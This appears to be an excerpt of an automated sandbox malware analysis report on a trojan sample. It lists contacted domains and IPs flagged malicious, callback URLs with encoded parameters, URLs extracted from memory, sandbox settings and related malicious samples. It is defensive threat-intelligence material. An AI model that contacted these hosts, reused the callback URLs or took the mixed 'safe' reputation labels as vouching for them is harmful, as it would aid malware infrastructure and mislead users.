          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.fontbureau.comalice:i0%Avira URL Cloudsafe
          http://www.jiyu-kobo.co.jp/jp/490%Avira URL Cloudsafe
          http://i3.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.eot0%Avira URL Cloudsafe
          http://i3.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.otf0%Avira URL Cloudsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.fontbureau.comepko0%URL Reputationsafe
          http://www.fontbureau.comepko0%URL Reputationsafe
          http://www.fontbureau.comepko0%URL Reputationsafe
          http://www.carterandcone.comroa0%Avira URL Cloudsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://i3.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.ttf0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.sarahcarver.com
          52.58.78.16
          truetrue
            unknown
            www.mybabytennis.com
            209.99.64.55
            truetrue
              unknown

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              http://www.sarahcarver.com/sm3l/?y0DdGli=yq5bXiAgrpTP0Cl4DWGobHu0GmgEguW+SJypzbO1DFimS8AGhR5rfP7J/muem3koPRQw&ixo0sr=dFQtktrue
              • Avira URL Cloud: safe
              unknown
              www.trendtechpros.com/sm3l/true
              • Avira URL Cloud: safe
              low
              http://www.mybabytennis.com/sm3l/?y0DdGli=KvXnBCtAoO2yHEt5dL0Fxw3RJm1prCWWr0IwHlUk9+xe6WE7Z8sx0d/816zczOTA6oQi&ixo0sr=dFQtktrue
              • Avira URL Cloud: safe
              unknown

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              http://www.mybabytennis.com/fashion_trends.cfm?fp=syKayxFxS7ngKoWOcFEHaS3GPZbkQaeTz%2FfOPjm6lptoBxA1control.exe, 0000000F.00000002.471576224.00000000050AF000.00000004.00000001.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://www.fontbureau.comueimal.exe, 00000000.00000003.207782523.000000000800A000.00000004.00000001.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://www.mybabytennis.com/px.js?ch=1control.exe, 0000000F.00000002.471576224.00000000050AF000.00000004.00000001.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://www.mybabytennis.com/High_Speed_Internet.cfm?fp=syKayxFxS7ngKoWOcFEHaS3GPZbkQaeTz%2FfOPjm6lptcontrol.exe, 0000000F.00000002.471576224.00000000050AF000.00000004.00000001.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://i3.cdn-image.com/__media__/pics/12471/kwbg.jpg)control.exe, 0000000F.00000002.471576224.00000000050AF000.00000004.00000001.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://www.fontbureau.com/designersexplorer.exe, 00000003.00000000.274814450.0000000008B40000.00000002.00000001.sdmpfalse
                high
                http://i3.cdn-image.com/__media__/pics/12471/arrow.png)control.exe, 0000000F.00000002.471576224.00000000050AF000.00000004.00000001.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://www.founder.com.cn/cns-m_=mal.exe, 00000000.00000003.204249088.000000000800E000.00000004.00000001.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://www.sajatypeworks.comexplorer.exe, 00000003.00000000.274814450.0000000008B40000.00000002.00000001.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                unknown
                http://www.founder.com.cn/cn/cTheexplorer.exe, 00000003.00000000.274814450.0000000008B40000.00000002.00000001.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                unknown
                http://www.jiyu-kobo.co.jp/sysmal.exe, 00000000.00000003.205981661.000000000800A000.00000004.00000001.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://i3.cdn-image.com/__media__/pics/12471/libgh.png)control.exe, 0000000F.00000002.471576224.00000000050AF000.00000004.00000001.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://www.mybabytennis.com/Migraine_Pain_Relief.cfm?fp=syKayxFxS7ngKoWOcFEHaS3GPZbkQaeTz%2FfOPjm6lpcontrol.exe, 0000000F.00000002.471576224.00000000050AF000.00000004.00000001.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://www.fontbureau.comcomde:imal.exe, 00000000.00000003.208751647.000000000800A000.00000004.00000001.sdmpfalse
                • Avira URL Cloud: safe
                low
                http://www.jiyu-kobo.co.jp//mal.exe, 00000000.00000003.205981661.000000000800A000.00000004.00000001.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                unknown
                http://www.mybabytennis.com/All_Inclusive_Vacation_Packages.cfm?fp=syKayxFxS7ngKoWOcFEHaS3GPZbkQaeTzcontrol.exe, 0000000F.00000002.471576224.00000000050AF000.00000004.00000001.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://www.goodfont.co.krTmal.exe, 00000000.00000003.203969376.000000000800E000.00000004.00000001.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://www.galapagosdesign.com/DPleaseexplorer.exe, 00000003.00000000.274814450.0000000008B40000.00000002.00000001.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                unknown
                http://www.fontbureau.comgritomal.exe, 00000000.00000003.207998268.000000000800A000.00000004.00000001.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                unknown
                http://www.sandoll.co.kr.krmal.exe, 00000000.00000003.204113869.000000000800E000.00000004.00000001.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://www.goodfont.co.krnmal.exe, 00000000.00000003.203969376.000000000800E000.00000004.00000001.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://www.fontbureau.comde:imal.exe, 00000000.00000003.207998268.000000000800A000.00000004.00000001.sdmpfalse
                • Avira URL Cloud: safe
                low
                http://i3.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.eot?#iefixcontrol.exe, 0000000F.00000002.471576224.00000000050AF000.00000004.00000001.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://www.mybabytennis.com/sm3l/?y0DdGli=KvXnBCtAoO2yHEt5dL0Fxw3RJm1prCWWr0IwHlUk9control.exe, 0000000F.00000002.471576224.00000000050AF000.00000004.00000001.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://www.urwpp.deDPleaseexplorer.exe, 00000003.00000000.274814450.0000000008B40000.00000002.00000001.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                unknown
                http://www.zhongyicts.com.cnexplorer.exe, 00000003.00000000.274814450.0000000008B40000.00000002.00000001.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                unknown
                http://www.fontbureau.comueumal.exe, 00000000.00000003.210571227.000000000800A000.00000004.00000001.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://www.sandoll.co.krBmal.exe, 00000000.00000003.203969376.000000000800E000.00000004.00000001.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://www.galapagosdesign.com/mal.exe, 00000000.00000003.211636615.000000000800A000.00000004.00000001.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                unknown
                http://i3.cdn-image.com/__media__/pics/12471/bodybg.png)control.exe, 0000000F.00000002.471576224.00000000050AF000.00000004.00000001.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                http://www.tiro.comlic&mal.exe, 00000000.00000003.205252766.0000000008008000.00000004.00000001.sdmpfalse
                • Avira URL Cloud: safe
                low
                http://www.fontbureau.com/designers~mal.exe, 00000000.00000003.209584380.000000000800A000.00000004.00000001.sdmpfalse
                  high
                  http://i3.cdn-image.com/__media__/pics/12471/search-icon.png)control.exe, 0000000F.00000002.471576224.00000000050AF000.00000004.00000001.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://www.fontbureau.com-mI:mal.exe, 00000000.00000003.207578003.000000000800A000.00000004.00000001.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://www.zhongyicts.com.cnfmal.exe, 00000000.00000003.204709826.0000000008007000.00000004.00000001.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://www.carterandcone.comimal.exe, 00000000.00000003.204823498.0000000008008000.00000004.00000001.sdmpfalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  unknown
                  http://www.fontbureau.come.commal.exe, 00000000.00000003.207824329.000000000800A000.00000004.00000001.sdmpfalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  unknown
                  http://www.carterandcone.comlexplorer.exe, 00000003.00000000.274814450.0000000008B40000.00000002.00000001.sdmpfalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  unknown
                  http://www.mybabytennis.com/Best_Penny_Stocks.cfm?fp=syKayxFxS7ngKoWOcFEHaS3GPZbkQaeTz%2FfOPjm6lptoBcontrol.exe, 0000000F.00000002.471576224.00000000050AF000.00000004.00000001.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://www.urwpp.deegmal.exe, 00000000.00000003.210675196.000000000800A000.00000004.00000001.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://www.founder.com.cn/cn0mal.exe, 00000000.00000003.204185338.0000000008005000.00000004.00000001.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://www.fontbureau.com/designers/frere-jones.htmlexplorer.exe, 00000003.00000000.274814450.0000000008B40000.00000002.00000001.sdmpfalse
                    high
                    http://www.jiyu-kobo.co.jp/vmal.exe, 00000000.00000003.206216760.0000000008005000.00000004.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    http://www.mybabytennis.com/Parental_Control.cfm?fp=syKayxFxS7ngKoWOcFEHaS3GPZbkQaeTz%2FfOPjm6lptoBxcontrol.exe, 0000000F.00000002.471576224.00000000050AF000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://www.fontbureau.comcomFmal.exe, 00000000.00000003.210270469.000000000800A000.00000004.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    http://www.fontbureau.comld9mal.exe, 00000000.00000003.207578003.000000000800A000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://www.founder.com.cn/cn8mal.exe, 00000000.00000003.204286511.0000000008005000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://www.mybabytennis.com/display.cfmcontrol.exe, 0000000F.00000002.471576224.00000000050AF000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://i3.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.woffcontrol.exe, 0000000F.00000002.471576224.00000000050AF000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://i3.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.svg#ubuntu-bcontrol.exe, 0000000F.00000002.471576224.00000000050AF000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://www.mybabytennis.com/px.js?ch=2control.exe, 0000000F.00000002.471576224.00000000050AF000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://www.sarahcarver.comcontrol.exe, 0000000F.00000002.471576224.00000000050AF000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://i3.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.svg#ubuntu-rcontrol.exe, 0000000F.00000002.471576224.00000000050AF000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://i3.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.woffcontrol.exe, 0000000F.00000002.471576224.00000000050AF000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://i3.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.woff2control.exe, 0000000F.00000002.471576224.00000000050AF000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://www.galapagosdesign.com/R:mal.exe, 00000000.00000003.211636615.000000000800A000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://www.fontbureau.com/designersGexplorer.exe, 00000003.00000000.274814450.0000000008B40000.00000002.00000001.sdmpfalse
                      high
                      http://www.jiyu-kobo.co.jp/49mal.exe, 00000000.00000003.205652032.0000000008005000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://www.fontbureau.com/designers/?explorer.exe, 00000003.00000000.274814450.0000000008B40000.00000002.00000001.sdmpfalse
                        high
                        http://www.founder.com.cn/cn/bTheexplorer.exe, 00000003.00000000.274814450.0000000008B40000.00000002.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        unknown
                        http://www.fontbureau.comalice:imal.exe, 00000000.00000003.210571227.000000000800A000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        low
                        http://www.jiyu-kobo.co.jp/jp/49mal.exe, 00000000.00000003.206216760.0000000008005000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://i3.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.eotcontrol.exe, 0000000F.00000002.471576224.00000000050AF000.00000004.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://www.fontbureau.com/designers?explorer.exe, 00000003.00000000.274814450.0000000008B40000.00000002.00000001.sdmpfalse
                          high
                          http://i3.cdn-image.com/__media__/fonts/ubuntu-b/ubuntu-b.otfcontrol.exe, 0000000F.00000002.471576224.00000000050AF000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://www.tiro.comexplorer.exe, 00000003.00000000.274814450.0000000008B40000.00000002.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          unknown
                          https://www.domain.com/controlpanel/domaincentral/3.0/control.exe, 0000000F.00000002.471576224.00000000050AF000.00000004.00000001.sdmpfalse
                            high
                            http://www.fontbureau.comepkomal.exe, 00000000.00000003.216548086.0000000008005000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            unknown
                            http://www.carterandcone.comroamal.exe, 00000000.00000003.204874236.0000000008008000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://www.goodfont.co.krmal.exe, 00000000.00000003.203969376.000000000800E000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.274814450.0000000008B40000.00000002.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            unknown
                            http://i3.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.ttfcontrol.exe, 0000000F.00000002.471576224.00000000050AF000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://www.carterandcone.commal.exe, 00000000.00000003.204789159.0000000008008000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            unknown
                            http://www.fontbureau.com/designersPmal.exe, 00000000.00000003.209584380.000000000800A000.00000004.00000001.sdmpfalse
                              high
                              http://www.jiyu-kobo.co.jp/w:mal.exe, 00000000.00000003.206216760.0000000008005000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://www.mybabytennis.com/find_a_tutor.cfm?fp=syKayxFxS7ngKoWOcFEHaS3GPZbkQaeTz%2FfOPjm6lptoBxA1INcontrol.exe, 0000000F.00000002.471576224.00000000050AF000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://www.typography.netDexplorer.exe, 00000003.00000000.274814450.0000000008B40000.00000002.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              unknown
                              http://www.carterandcone.como.pmal.exe, 00000000.00000003.204733994.0000000008008000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://www.fontbureau.comuetow:mal.exe, 00000000.00000003.216548086.0000000008005000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://www.galapagosdesign.com/staff/dennis.htmmal.exe, 00000000.00000003.211735765.0000000008027000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.274814450.0000000008B40000.00000002.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              unknown
                              http://fontfabrik.comexplorer.exe, 00000003.00000000.274814450.0000000008B40000.00000002.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              unknown
                              http://i3.cdn-image.com/__media__/pics/12471/logo.png)control.exe, 0000000F.00000002.471576224.00000000050AF000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://www.fontbureau.com/designersdmal.exe, 00000000.00000003.209521434.000000000800A000.00000004.00000001.sdmpfalse
                                high
                                http://www.fonts.comexplorer.exe, 00000003.00000000.274814450.0000000008B40000.00000002.00000001.sdmpfalse
                                  high
                                  http://www.sandoll.co.krmal.exe, 00000000.00000003.204113869.000000000800E000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.274814450.0000000008B40000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  unknown
                                  http://www.fontbureau.com/designerszmal.exe, 00000000.00000003.207998268.000000000800A000.00000004.00000001.sdmp, mal.exe, 00000000.00000003.210571227.000000000800A000.00000004.00000001.sdmpfalse
                                    high
                                    http://www.urwpp.demal.exe, 00000000.00000003.207276085.000000000800A000.00000004.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    unknown
                                    http://www.jiyu-kobo.co.jp/es-mI:mal.exe, 00000000.00000003.206216760.0000000008005000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.fontbureau.comalssysmal.exe, 00000000.00000003.210571227.000000000800A000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.sakkal.commal.exe, 00000000.00000003.206412694.0000000008008000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.274814450.0000000008B40000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    unknown
                                    http://www.carterandcone.comigmal.exe, 00000000.00000003.204789159.0000000008008000.00000004.00000001.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.apache.org/licenses/LICENSE-2.0explorer.exe, 00000003.00000000.274814450.0000000008B40000.00000002.00000001.sdmpfalse
                                      high
                                      http://www.fontbureau.commal.exe, 00000000.00000003.207998268.000000000800A000.00000004.00000001.sdmp, explorer.exe, 00000003.00000000.274814450.0000000008B40000.00000002.00000001.sdmpfalse
                                        high
                                        http://i3.cdn-image.com/__media__/fonts/ubuntu-r/ubuntu-r.eotcontrol.exe, 0000000F.00000002.471576224.00000000050AF000.00000004.00000001.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.fontbureau.comFmal.exe, 00000000.00000003.208751647.000000000800A000.00000004.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        unknown
                                        http://www.urwpp.deZmal.exe, 00000000.00000003.207276085.000000000800A000.00000004.00000001.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.founder.com.cn/cn/Dmal.exe, 00000000.00000003.204496454.0000000008007000.00000004.00000001.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.jiyu-kobo.co.jp/pt-pmal.exe, 00000000.00000003.205710785.000000000800A000.00000004.00000001.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown

                                        Contacted IPs

                                        • No. of IPs < 25%
                                        • 25% < No. of IPs < 50%
                                        • 50% < No. of IPs < 75%
                                        • 75% < No. of IPs

                                        Public

                                        IPDomainCountryFlagASNASN NameMalicious
                                        52.58.78.16
                                        www.sarahcarver.comUnited States
                                        16509AMAZON-02UStrue
                                        209.99.64.55
                                        www.mybabytennis.comUnited States
                                        40034CONFLUENCE-NETWORK-INCVGtrue

                                        General Information

                                        Joe Sandbox Version:33.0.0 White Diamond
                                        Analysis ID:452374
                                        Start date:22.07.2021
                                        Start time:08:44:12
                                        Joe Sandbox Product:CloudBasic
                                        Overall analysis duration:0h 8m 59s
                                        Hypervisor based Inspection enabled:false
                                        Report type:light
                                        Sample file name:mal.pif (renamed file extension from pif to exe)
                                        Cookbook file name:default.jbs
                                        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                        Number of analysed new started processes analysed:25
                                        Number of new started drivers analysed:0
                                        Number of existing processes analysed:0
                                        Number of existing drivers analysed:0
                                        Number of injected processes analysed:0
                                        Technologies:
                                        • HCA enabled
                                        • EGA enabled
                                        • HDC enabled
                                        • AMSI enabled
                                        Analysis Mode:default
                                        Analysis stop reason:Timeout
                                        Detection:MAL
                                        Classification:mal100.troj.evad.winEXE@7/1@2/2
                                        EGA Information:Failed
                                        HDC Information:
                                        • Successful, ratio: 48.9% (good quality ratio 45.2%)
                                        • Quality average: 75.8%
                                        • Quality standard deviation: 29.7%
                                        HCA Information:
                                        • Successful, ratio: 100%
                                        • Number of executed functions: 0
                                        • Number of non-executed functions: 0
                                        Cookbook Comments:
                                        • Adjust boot time
                                        • Enable AMSI
                                        Warnings:
                                        Show All
                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                        • Excluded IPs from analysis (whitelisted): 93.184.220.29, 13.88.21.125, 13.64.90.137, 168.61.161.212, 204.79.197.200, 13.107.21.200, 20.50.102.62, 23.211.4.86, 40.112.88.60, 173.222.108.226, 173.222.108.210, 80.67.82.211, 80.67.82.235, 20.49.157.6
                                        • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, cs9.wac.phicdn.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, ocsp.digicert.com, www-bing-com.dual-a-0001.a-msedge.net, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, www.bing.com, skypedataprdcolwus17.cloudapp.net, fs.microsoft.com, dual-a-0001.a-msedge.net, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, skypedataprdcolcus17.cloudapp.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, ris.api.iris.microsoft.com, a-0001.a-afdentry.net.trafficmanager.net, blobcollector.events.data.trafficmanager.net, iris-de-ppe-azsc-uks.uksouth.cloudapp.azure.com, skypedataprdcolwus15.cloudapp.net
                                        • Not all processes where analyzed, report is missing behavior information
                                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.

                                        Simulations

                                        Behavior and APIs

                                        TimeTypeDescription
                                        08:45:17API Interceptor1x Sleep call for process: mal.exe modified

                                        Joe Sandbox View / Context

                                        IPs

                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                        52.58.78.16PO_2005042020.exeGet hashmaliciousBrowse
                                        • www.ameri.loans/dt9v/?WJBxWP=43H5ZqapR2U2c+53UedyyCnf/tAQMSihskCSywJ+5iH1soBQckHw2KLayvSLN2TiqtAl&tFQp=7nutZ
                                        Invoice-Scancopy.docxGet hashmaliciousBrowse
                                        • www.ess.xyz/k2m6/?-Z=5jztvT3H&eXrxUtg=48Fqwwc0TpMWpKdyZvZdJZLrLfV5OyuFq874jIM8N+PC/lGntTttinAjIfEcXvLx+ei6yw==
                                        ORDER 200VPS.xlsxGet hashmaliciousBrowse
                                        • www.aideliveryrobot.com/p2io/?bH=xikLqsOKlSWJt+SrZg8c4HdBraEMa/77ZWZXTseglAkSxnPi++5EYIqDKkXYJ2G/5JhnXw==&XV88=urL00v88onXp_
                                        LAGIk5ic3R.exeGet hashmaliciousBrowse
                                        • www.quickinterchangeableguitars.com/0mq2/?fDHX8=WleDGb2XfF7tUd0&o6ATq=PrDeBWOvFm4C1uiT5+TkruHjtP7PYgIXMNukuC19GOh7I/zDw4hvhKpfG3R3/sFyDX1r
                                        3456_RFQ998778.xlsxGet hashmaliciousBrowse
                                        • www.jmbossvodka.com/gno4/?-ZS=YdtY2bnE57KZ5WgSsIzeA3q4iz7LDafvQmGQHnumUAAK16ZgD7FJS8vZbyZDCBBis2h0IQ==&e4=8pNH
                                        Payment_Breakdown_pdf.exeGet hashmaliciousBrowse
                                        • www.onlineappointmentsystem.com/ons5/?3f-=nVZuwkx8QtdDg8xrBBXA1XtU0x+dB6tS53/N0IsFnt8ggCwz+Hq54W4pscUCIRDkRkLu&YR-0=y48tk6C
                                        owen.exeGet hashmaliciousBrowse
                                        • www.syeioraom.com/a8si/?g2J4yx=-Zg4GfE&S4=2gqxBbxdCHAGZiW08HusmFGOvmsXdbr8Hht+pti8HbRhpYj5OmStbJLwswr0+a+SFvsW
                                        FASMW.EXEGet hashmaliciousBrowse
                                        • www.elprado.life/cabq/?iZ=2di86hvH&h6R8xP=7Gl0G44haCAnuWN+7VTog1C/raccTS26kDhalZqSPKgWVaNcTe2u+1G8JtOTpBZpOa50
                                        po_order_item_29062021.exeGet hashmaliciousBrowse
                                        • www.monkeyhunter.com/rht3/?y0=Btx4&RV_l=AlhR87CcH+GN+pIusHgdFqhLxnRwmvwNBNp0g7IcE6I1zhj/b7sMRAUJpklc7EpOOxOv
                                        Minutes of Meeting 22062021.exeGet hashmaliciousBrowse
                                        • www.eclorui.com/u9pi/?uXR=Z6AdLL&QDHdAp=SWx04GMips4+qG0r1MuFGGrLJlmHj2ZkiaS2KvW5DkDO80Zko+5IrbiudSoPPaV6iNFo
                                        PO NEW ORDER 002001123.exeGet hashmaliciousBrowse
                                        • www.sparktattoo.com/0mq2/?c4=IDKtp8tH&4h_hvt=idlga/P0FfYCKTBivrcOkdytvtILpJxZJlPumr4sHFEsS0Scr/u/HZg+xbKITV9CPDtJ
                                        Swift advice Receipt.exeGet hashmaliciousBrowse
                                        • www.a-v-r.com/n86i/?u2MpU0a=WwYEqAm2RTF4TFg6Jp6u7CuwpfJ8oxKF4GY56fD50OPmZs5P3Qyp6f8YN06/kKU0Yzpf&1bWh=5jQLgpC8L23
                                        eHTLcWfhgv.exeGet hashmaliciousBrowse
                                        • www.newmopeds.com/p2io/?0R-DOx9=bSK1RxPJHkVUetqtOJ2LeA3okZHmhG3V4GZ2PZxkhAIUk0ADTbWPbz8cbf0TAQaa2gAlI7xx6A==&y6A=xFQDIPbxpJaT
                                        Import Custom Duty invoice & its clearance documents.exeGet hashmaliciousBrowse
                                        • www.cool-sil.com/iic6/?r4pT=y/kfwyw/RZwsvgZE5IY9NPvw7FTiW/OGKxX5BqNDRQj08yuVS/JTuewaC78miPUy3gtG&lR-x=DPUt3nr8mrdpDjG
                                        TT-Bank-Slip.exeGet hashmaliciousBrowse
                                        • www.vaginalmedicine.com/m3rc/?p2=6BmCuDx6HNPQiFPRwokPcjAogbQnX9jjbIUytqHBtaq3fAyAKA3thvTVTfc9FuV2tCtq&6lM=SJEx9rv
                                        Enquiry_014821-23.exeGet hashmaliciousBrowse
                                        • www.johnmabry.com/n86i/?zBtlQRl=Y8G/RqOPd6iMXSNDp68Mpx61scf3/6KZP+emN2XlS3BALTl1RcjIqekJnqea+Qg2WqdJDqumrQ==&-ZW=NBsHKPh0D0YP7FE
                                        SKM_4050210326102400 jpg.exeGet hashmaliciousBrowse
                                        • www.justswap.exchange/nvj9/?4h=Cjox&2d=Gj4Cv32t3ARgUuXe7mKAQ+9mCrtvpk7DjPJ1bxEeyJuHh3fNmA6VhARMN6sncqWGGRf/
                                        kkaH2ZEdQ1.exeGet hashmaliciousBrowse
                                        • www.cacacece.com/ybn/?oRm8=s8YlDbK80xIp&-ZdTr=nRee68VRz3NrMycEhRd2xL3VYKU8ZPsfy7+/YZQiZ17kpYPgKQlxEGBpOHvvMJMEZLP0
                                        RE Purchase Order.exeGet hashmaliciousBrowse
                                        • www.dahumblehustla.com/u6e4/?WBZD=FcjbzBS6ioR5wNj31i3bICntrHdtVtLDdz4suCSLzvDCKJtKmLQo4u4Bo+cvT6cF9+Bm&TR-=0b08lfbHdjGhtdZp
                                        J1Dud83xTM.exeGet hashmaliciousBrowse
                                        • www.aideliveryrobot.com/p2io/?A84HSd=xikLqsOPlVWNtuenbg8c4HdBraEMa/77ZWBHPvChhgkTxWjk5uoIOMSBJB7ONmCMyK8X&m0DDI=7n0XLDsHCfKHsv
                                        209.99.64.55Revised PI.exeGet hashmaliciousBrowse
